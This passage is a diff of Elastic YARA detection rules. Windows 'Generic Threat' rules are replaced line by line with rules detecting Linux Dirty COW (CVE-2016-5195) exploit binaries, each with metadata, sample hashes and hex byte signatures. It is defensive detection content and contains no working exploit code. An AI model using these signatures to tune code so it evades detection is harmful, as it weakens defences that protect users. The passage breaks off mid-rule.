"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "679392e78d4abefc05b885e43aaccc2da235bd7f2a267c6ecfbe2cf824776993" + logic_hash = "55c3992ca62ebaf8d45aff818d3261838d239f2004125689ea81edca2cfa59c2" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "33f35c5c73656fc5987c39fabefa1225fef1734f4217518a1b6e7a78669c90c5" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "a841f4b929c79eadfa8deeb3a6f410056aec94dd1e0d9c8e5dc31675de936403" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 56 8B 75 08 85 F6 74 5A ?? ?? ?? ?? ?? 83 F8 03 75 16 56 E8 ED 01 00 00 59 85 C0 56 74 36 50 E8 0C 02 00 00 59 59 EB 3A 83 F8 02 75 26 8D 45 08 50 8D 45 FC 50 56 E8 25 0F 00 00 } + $a = { 55 48 89 E5 48 83 EC 20 89 7D EC 89 75 E8 8B 45 E8 48 C1 E0 05 48 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_4C37E16E : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ea8801Ac : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "4c37e16e-b7ca-449a-a09f-836706b2f66a" - date = "2024-03-04" - modified = "2024-06-12" + id = "ea8801ac-ee95-4294-9cfa-99c773a04183" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2922-L2941" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d83a8ed5e192b3fe9d74f3a9966fa094d23676c7e6586c9240d97c252b8e4e74" - logic_hash = "dabac8aa6a3f4d4bd726161fc6573ca9de4088e7d818c3cf33cafc91f680e7aa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7acccfd8c2e5555a3e3bf979ad2314c12a939c1ef32b66e61e30a712f07164fd" + logic_hash = "00a7f71a0559f937ace15465059147839598897467db6176040882d86111bcd2" score = 75 - quality = 71 - tags = "FILE, MEMORY" - fingerprint = "9fbd2883fb0140de50df755f7099a0dc3cf377ee350710108fef96c912f43460" - severity = 50 + quality = 75 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "aa191347bdf2e9fdcf6f9591c370b85208a1c46a329bc648268447dbb5ea898f" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 2E 3F 41 56 43 44 72 6F 70 41 70 69 40 40 } - $a2 = { 2D 2D 77 77 6A 61 75 67 68 61 6C 76 6E 63 6A 77 69 61 6A 73 2D 2D } + $a = { 55 48 89 E5 48 83 EC 30 89 7D DC 48 89 75 D0 83 7D DC 02 7F 0A B8 01 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_5Be3A474 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_B2Ebdebd : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "5be3a474-d12f-489f-a2a7-87d29687e2e6" - date = "2024-03-04" - modified = "2024-06-12" + id = "b2ebdebd-0110-46b4-a97f-27c4c495b23d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2943-L2961" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b902954d634307260d5bd8fb6248271f933c1cbc649aa2073bf05e79c1aedb66" - logic_hash = "0f0f46e3bdebb47a4f43ccb64d65ab1e15d68d38c117cb25e5723ec16e7e0758" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dee49d4b7f406fd1728dad4dc217484ced2586e014e2cd265ea64eff70a2633d" + logic_hash = "a9d6ffa65b503f9aa13a0054fa92e346c86585418b6b72131efc00340f8ec224" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "8b220ea86ad3bbdcf6e2f976dc0bb84c1eb8cb1f3ad46ab5c9d19289952c912b" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "2a98a2d1be205145eb2d30a57aaa547b30281b31981f0872ba3f7e1d684a0cc2" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 53 56 57 8B F9 33 F6 8D 5F 02 66 8B 07 83 C7 02 66 3B C6 75 F5 8A 01 2B FB D1 FF 8D 5F FF 85 DB 7E 23 0F B6 F8 83 C1 02 66 8B 01 8D 49 02 66 2B C7 C7 45 FC 00 08 00 00 66 2B 45 FC } + $a = { 55 48 89 E5 48 83 EC 30 48 89 7D D8 48 8B 45 D8 48 89 45 F8 BE 02 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_B191061E : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_9190D516 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "b191061e-7b83-4161-a1d4-05ab70ffe2be" - date = "2024-03-04" - modified = "2024-06-12" + id = "9190d516-dea0-4d74-9f2c-bd2337538258" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2963-L2981" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bd4ef6fae7f29def8e5894bf05057653248f009422de85c1e425d04a0b2df258" - logic_hash = "cbee10eab984249ceb9f8a82dc06aa014d6a249321f3d4f0d1e5657aab205ec8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "837ffed1f23293dc9c7cb994601488fc121751a249ffde51326947c33c5fca7f" + logic_hash = "370248d2b6bb625d65f160b62f1b4a7d2809f3fedfb98a009b19dab61f0ba57e" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "5733de0357a6b5f6a3fe885786084c23707266b48e67b19dcddc48ed97e94207" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "977bafd175a994edaef5f3fa19d19fe161cebb2447ee32fd5d4b0a3b93fb51fa" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 2C 64 A1 30 00 00 00 33 D2 53 56 57 8B 40 0C 8B F2 89 4D E8 89 55 F4 89 75 F8 8B 58 0C 8B 7B 18 89 7D F0 85 FF 0F 84 34 01 00 00 C7 45 E0 60 00 00 00 8B 43 30 89 55 FC 89 55 EC } + $a = { 4D 18 48 8B 55 10 48 8B 75 F0 48 8B 45 F8 48 83 EC 08 41 51 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_05F52E4D : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_3B460716 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "05f52e4d-d131-491a-a037-069b450e3b3e" - date = "2024-03-04" - modified = "2024-06-12" + id = "3b460716-812e-4884-ab66-e01f2e61996d" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2983-L3001" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e578b795f8ed77c1057d8e6b827f7426fd4881f02949bfc83bcad11fa7eb2403" - logic_hash = "79898b59b6d3564aad85d823a1450600faff5b1d2dbfbe0cee4cc59971e4f542" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8c4d49d4881ebdab1bd0e083d4e644cfc8eb7af3b96664598526ab3d175fc420" + logic_hash = "759e08c9e3405d841aa467c3343cfac01fed9e9d86aca90139d0eae8855942e5" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "f3d5f6dc1f9b51ce1700605c8a018000124d66a260771de0da1a321dc97872dd" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "900e22d1a157677698a47d49d2deeb52c938e3a790aba689b920ba1bbd7ed39d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 06 73 45 00 00 0A 73 46 00 00 0A 6F 47 00 00 0A 14 FE 06 29 00 00 06 73 45 00 00 0A 73 46 00 00 0A 0B 14 FE 06 2A 00 00 06 73 45 00 00 0A 73 46 00 00 0A 0C 07 6F 47 00 00 0A 08 6F 47 } + $a = { 55 48 89 E5 48 83 EC 30 48 89 7D D8 48 8B 45 D8 48 89 45 E8 BE 02 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_C34E19E9 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ccfd7518 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "c34e19e9-c666-4fc5-bbb3-75f64d247899" - date = "2024-03-04" - modified = "2024-06-12" + id = "ccfd7518-af6c-4378-bd9c-7267a7f0dab4" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3003-L3021" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f9048348a59d9f824b45b16b1fdba9bfeda513aa9fbe671442f84b81679232db" - logic_hash = "87999b6f2cf359b6436ee7e57691ac73fc41f3947bf8fef3f6b98148e17f180d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L161-L179" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b1017db71cf195aa565c57fed91ff1cdfcce344dc76526256d5817018f1351bf" + logic_hash = "02720152af167f1a7e5707f97aa920c6d955458df58d8ef0d9eba868da6a16af" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "148ffb1f73a3f337d188c78de638880ea595a812dfa7a0ada6dc66805637aeb3" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "4797064d6416f2799691ae7df956d0383dfe6094de29fb03fc8233ad89149942" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 0A 73 18 00 00 0A 7E 02 00 00 04 17 8D 3A 00 00 01 25 16 1F 2C 9D 6F 28 00 00 0A 8E 69 6F 29 00 00 0A 9A 0A 7E 01 00 00 04 17 8D 3A 00 00 01 25 16 1F 2C 9D 6F 28 00 00 0A 73 18 00 00 } + $a = { 83 45 FC 01 81 7D FC FF E0 F5 05 7F 0A 8B 05 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_E691Eaa1 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_D41C2C63 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "e691eaa1-06fa-478e-8c4c-95a7df3fd077" - date = "2024-03-04" - modified = "2024-06-12" + id = "d41c2c63-1af7-47c9-88a0-16454c9583db" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3023-L3041" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "afa5f36860e69b9134b93e9ad32fed0a5923772e701437e1054ea98e76f28a77" - logic_hash = "0ac310e3f7cf99b77c2dcfea582752e2f1414caf43965c25d2f3f03cf27586cc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L181-L199" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a4e5751b4e8fa2e9b70e1e234f435a03290c414f9547dc7709ce2ee4263a35f1" + logic_hash = "c9460cfc2b6d686145be9afd3ed670619f04c7155b03caa193222cba8405160d" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "b940eb10e338f6d703a75cd77b4b455503ae0583f5a36b8115e659d05990fc3c" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "77fb7e9911d1037bba0a718d8983a42ad1877c13d865ce415351d599064ea7ea" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 8B C2 53 89 45 FC 8B D9 56 99 33 F6 2B C2 57 8B F8 D1 FF 85 FF 7E 2B 8B 55 FC 4A 03 D3 0F B6 02 8D 52 FF 8A 0C 1E ?? ?? ?? ?? ?? ?? ?? 88 04 1E 46 0F B6 C1 } + $a = { F4 83 45 F0 01 81 7D F0 FF C1 EB 0B 7E D3 C9 C3 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_5E33Bb4B : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ffa7F059 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "5e33bb4b-830e-4814-b6cf-d5e5b4da7ada" - date = "2024-03-04" - modified = "2024-06-12" + id = "ffa7f059-b825-4dd6-b10d-e57549a2704f" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3043-L3061" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "13c06d7b030a46c6bb6351f40184af9fafaf4c67b6a2627a45925dd17501d659" - logic_hash = "7e2002c3917ccab7d9f56a7aa20ea75be71aa7fdc64b7c3f87edb68be38e74b2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L201-L219" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a073c6be047ea7b4500b1ffdc8bdadd9a06f9efccd38c88e0fc976b97b2b2df5" + logic_hash = "b558066b80232ceb32c625f49a0ddeccd4b3bc52e664e5a72f2aa7361bcec352" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "a08b9db015f1b6f62252d456b1b0cd0fdec1e19cdd2bc1400fe2bf76150ea07b" - severity = 50 + quality = 75 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "c451689042d9290d1bb5b931e002237584217bbddfc0d96c2486a61cb5c37d31" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 43 3A 5C 55 73 65 72 73 5C 61 64 6D 69 6E 5C 44 65 73 6B 74 6F 70 5C 57 6F 72 6B 5C 46 69 6C 65 49 6E 73 74 61 6C 6C 65 72 5C 52 65 6C 65 61 73 65 5C 46 69 6C 65 49 6E 73 74 61 6C 6C 65 72 2E 70 64 62 } + $a = { F8 83 45 FC 01 81 7D FC FF C1 EB 0B 7E D7 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Be64Ba10 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_Fb24C7E4 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "be64ba10-ea9d-45df-8c9b-2facc825b652" - date = "2024-03-04" - modified = "2024-06-12" + id = "fb24c7e4-db4f-405e-8e88-bc313b9a0358" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3063-L3082" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "24bb4fc117aa57fd170e878263973a392d094c94d3a5f651fad7528d5d73b58a" - logic_hash = "c6acce53610baf119a0e2d55fc698a976463bbd21b739d4ac39a75383fa5fed2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L221-L239" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a073c6be047ea7b4500b1ffdc8bdadd9a06f9efccd38c88e0fc976b97b2b2df5" + logic_hash = "17a2a628f2d1fa088a1e0c5b2ad3f08e24b8504033b328c944b9ae83a5d12fcc" score = 75 - quality = 71 - tags = "FILE, MEMORY" - fingerprint = "9496099988cf4f854bf7f70bae158c6e17025a7537245c5f1d92a90f6b9bca67" - severity = 50 + quality = 75 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "0a5f15ddb425a6e00f6c3964b4dbdc91a856fd06b6e45dfd4fded8ed97f21ae8" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 22 65 6E 63 72 79 70 74 65 64 5F 6B 65 79 22 3A 22 28 2E 2B 3F 29 22 } - $a2 = { 2E 3F 41 56 3C 6C 61 6D 62 64 61 5F 37 65 66 38 63 66 32 36 39 61 32 32 38 62 36 30 34 64 36 35 34 33 32 65 37 65 63 33 37 30 31 34 3E 40 40 } + $a = { F8 83 45 FC 01 81 7D FC FF C1 EB 0B 7E ?? 8B 45 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_7Bb75582 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_B45098Df : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "7bb75582-ffcd-4a91-8816-811a3f9bdec8" - date = "2024-03-04" - modified = "2024-06-12" + id = "b45098df-7f26-44a9-8078-f1c05d15cc38" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3084-L3102" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "35f9698e9b9f611b3dd92466f18f97f4a8b4506ed6f10d4ac84303177f43522d" - logic_hash = "d959f755d28782b332248085034950a8d4cad3cde13b22254c90ca3952919e1b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L241-L259" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e053aca86570b3781b3e08daab51382712270d2a375257c8b5789d3d87149314" + logic_hash = "4622551b73a12c5399df1f4e052ce32b4cee04486a870bc92942c8597dcad1f7" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "326a08e467cbedb01c640232ad2f4da729894f09ccf5faba93926e1efded9b59" - severity = 50 + quality = 75 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "ed32e66f2c18b16a6f00d6a696a32cdb1b0b18413b4c1af059097f5d301ee084" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 48 4B 45 59 5F 43 55 52 52 45 4E 54 5F 55 53 45 52 5C 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 49 6E 74 65 72 6E 65 74 20 53 65 74 74 69 6E 67 73 5C 43 6F 6E 6E 65 63 74 69 6F 6E 73 20 5B 31 20 37 20 31 37 5D } + $a = { FC 83 45 F8 01 81 7D F8 FF C1 EB 0B 7E D7 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_59698796 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_9C67A994 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "59698796-0022-486a-a743-6931745f38a0" - date = "2024-03-04" - modified = "2024-06-12" + id = "9c67a994-dabf-4cb7-95d7-4cc47402be28" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3104-L3122" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "35f9698e9b9f611b3dd92466f18f97f4a8b4506ed6f10d4ac84303177f43522d" - logic_hash = "59569049dbb09b7e15110fb8de1a146eb7fd606f116b4dd6c75ca973fb62296e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L261-L279" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "70429d67402a43ed801e295b1ae1757e4fccd5d786c09ee054591ae51dfc1b25" + logic_hash = "742ce59fadefe242ca97d8ce603976fa8b5e1ba55ede38434c04dcd6f4891712" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "9260d02c3e6b163fd376445bd2a9c084ed85a5dbaf0509e15fff4e9c3d147f19" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "fc6690eef99dd9f84f62444d7a7e1b52dc7f46e831a5ab3e87d4282bba979fde" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 81 EC B8 04 00 00 ?? ?? ?? ?? ?? 33 C5 89 45 FC 56 68 00 04 00 00 0F 57 C0 C7 45 F8 00 00 00 00 8D 85 58 FB FF FF C7 85 54 FB FF FF 24 00 00 00 6A 00 50 8B F1 0F 11 45 D8 0F 11 45 E8 } + $a = { FC 83 45 F8 01 81 7D F8 FF C1 EB 0B 7E ?? 8B } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_2Ae9B09E : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_Ab87C1Ed : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "2ae9b09e-b810-4bd2-9cb8-18b1d504eede" - date = "2024-03-05" - modified = "2024-06-12" + id = "ab87c1ed-f538-4785-b7ae-5333a7ff2808" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3124-L3142" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dc8f4784c368676cd411b7d618407c416d9e56d116dd3cd17c3f750e6cb60c40" - logic_hash = "183249214e5f8143eb91caf20778b870d17d7a52b6d71ad603827e8716e7e447" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L281-L299" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c13c32d3a14cbc9c2580b1c76625cce8d48c5ae683230149a3f41640655e7f28" + logic_hash = "737f5ff982d2b656918ad3258ca20bce2ec416f2af743335b9a87a86f78be810" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "13ab32abf52bca58dfac79c09882ec4cb80b606693db19813d84e625bda93549" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "3bf2be85120ef3711dd3508bf8fcd573a70c7ad4a5066be1b60d777a53cd37b6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 51 8B 45 08 89 45 FC 8B 45 0C 89 45 F8 8B 45 0C 48 89 45 0C 83 7D F8 00 76 0F 8B 45 FC C6 00 00 8B 45 FC 40 89 45 FC EB DE 8B 45 08 C9 C3 6A 41 5A 0F B7 C1 66 3B D1 77 0C 66 83 F9 } + $a = { FF FF 88 45 EF 80 7D EF FF 75 D6 B8 ?? ?? 04 08 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_604A8763 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_F1C0482A : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "604a8763-7ec1-4474-b238-2ebbaf24afa2" - date = "2024-03-05" - modified = "2024-06-12" + id = "f1c0482a-fe88-4777-8d49-aa782bf25a98" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3144-L3162" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2a51fb11032ec011448184a4f2837d05638a7673d16dcf5dcf4005de3f87883a" - logic_hash = "cf88c0d102680fc7c16d49b6e8dc49c16b27d5940edf078e667a45e70ebe3883" + source_url = 